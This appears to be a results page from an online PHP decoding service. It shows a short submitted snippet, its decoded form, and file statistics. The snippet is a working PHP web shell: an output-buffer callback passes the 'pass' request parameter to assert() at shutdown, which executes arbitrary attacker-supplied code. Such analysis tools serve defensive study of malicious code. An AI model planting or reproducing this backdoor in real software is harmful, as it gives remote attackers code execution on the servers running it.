Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); echo $_REQUE..
Decoded Output download
<?php
ob_start(function ($c,$d){register_shutdown_function('assert',$c);});
echo $_REQUEST['pass'];
ob_end_flush();
?>
Did this file decode correctly?
Original Code
<?php
ob_start(function ($c,$d){register_shutdown_function('assert',$c);});
echo $_REQUEST['pass'];
ob_end_flush();
?>
Function Calls
None |
Stats
MD5 | ba6f10d1cb6499ab2a2b90f67d9cfd38 |
Eval Count | 0 |
Decode Time | 81 ms |